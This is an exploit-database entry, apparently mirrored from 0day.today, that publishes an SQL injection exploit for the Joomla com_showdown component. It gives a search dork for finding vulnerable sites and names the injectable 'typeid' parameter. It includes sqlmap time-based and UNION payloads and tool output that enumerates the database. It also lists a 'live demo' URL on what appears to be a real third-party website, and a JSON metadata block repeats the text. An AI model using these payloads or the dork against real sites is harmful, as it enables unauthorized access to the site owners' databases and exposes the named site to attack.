Search...

Joomla com_showdown SQL injection Vulnerability

2016-10-04T00:00:00

ID 1337DAY-ID-25286
Type zdt
Reporter xBADGIRL21
Modified 2016-10-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Joomla com_showdown SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_showdown
# version : 1.5.0
# Tested on: [ Windows 7 ]
# skype:xbadgirl21
# Date: 2016/07/24
# video Proof : https://youtu.be/IglNYsDcV3g
######################
# [+] DESCRIPTION :
######################
# [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or
# [+] You Will Notice a change in the Frontpage of the target .
######################
# [+] Poc :
######################
# [typeid] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE]
######################
# [+] SQLmap PoC:
######################
# GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
#
# Parameter: typeid (GET)
# Type: AND/OR time-based blind
# Title: MySQL &gt;= 5.0.12 AND time-based blind
# Payload: option=com_showdown&typeid=11 AND SLEEP(5)
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 6 columns
# Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870
# 43554447614a527451564c,0x71706a7171),NULL-- LZga
# ---
# [12:59:46] [INFO] the back-end DBMS is MySQL
# web server operating system: Linux Debian 6.0 (squeeze)
# web application technology: PHP 5.2.6, Apache 2.2.16
# back-end DBMS: MySQL &gt;= 5.0.12
# [12:59:46] [INFO] fetching database names
# available databases [3]:
######################
# [+] Live Demo :
######################
# http://www.circuse.eu/index.php?option=com_showdown&typeid=11
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

#  0day.today [2018-03-19]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-25286", "lastseen": "2018-03-19T09:10:04", "viewCount": 13, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-03-19T09:10:04", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-19T09:10:04", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/25286", "description": "Exploit for php platform in category web applications", "title": "Joomla com_showdown SQL injection Vulnerability", "cvelist": [], "sourceData": "######################\r\n# Exploit Title : Joomla com_showdown SQL injection Vulnerability\r\n# Exploit Author : xBADGIRL21\r\n# Dork : inurl:index.php?option=com_showdown\r\n# version : 1.5.0\r\n# Tested on: [ Windows 7 ]\r\n# skype:xbadgirl21\r\n# Date: 2016/07/24\r\n# video Proof : https://youtu.be/IglNYsDcV3g\r\n######################\r\n# [+] DESCRIPTION :\r\n######################\r\n# [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or [\"] to\r\n# [+] Vuln Target Parameter you will get error like :\r\n# [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or\r\n# [+] You Will Notice a change in the Frontpage of the target .\r\n######################\r\n# [+] Poc :\r\n######################\r\n# [typeid] Get Parameter Vulnerable To SQLi\r\n# http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE]\r\n######################\r\n# [+] SQLmap PoC:\r\n######################\r\n# GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]\r\n#\r\n# Parameter: typeid (GET)\r\n# Type: AND/OR time-based blind\r\n# Title: MySQL >= 5.0.12 AND time-based blind\r\n# Payload: option=com_showdown&typeid=11 AND SLEEP(5)\r\n#\r\n# Type: UNION query\r\n# Title: Generic UNION query (NULL) - 6 columns\r\n# Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870\r\n# 43554447614a527451564c,0x71706a7171),NULL-- LZga\r\n# ---\r\n# [12:59:46] [INFO] the back-end DBMS is MySQL\r\n# web server operating system: Linux Debian 6.0 (squeeze)\r\n# web application technology: PHP 5.2.6, Apache 2.2.16\r\n# back-end DBMS: MySQL >= 5.0.12\r\n# [12:59:46] [INFO] fetching database names\r\n# available databases [3]:\r\n######################\r\n# [+] Live Demo :\r\n######################\r\n# http://www.circuse.eu/index.php?option=com_showdown&typeid=11\r\n######################\r\n# Discovered by : xBADGIRL21\r\n# Greetz : All Mauritanien Hackers - NoWhere\r\n######################\n\n# 0day.today [2018-03-19] #", "published": "2016-10-04T00:00:00", "references": [], "reporter": "xBADGIRL21", "modified": "2016-10-04T00:00:00", "href": "https://0day.today/exploit/description/25286"}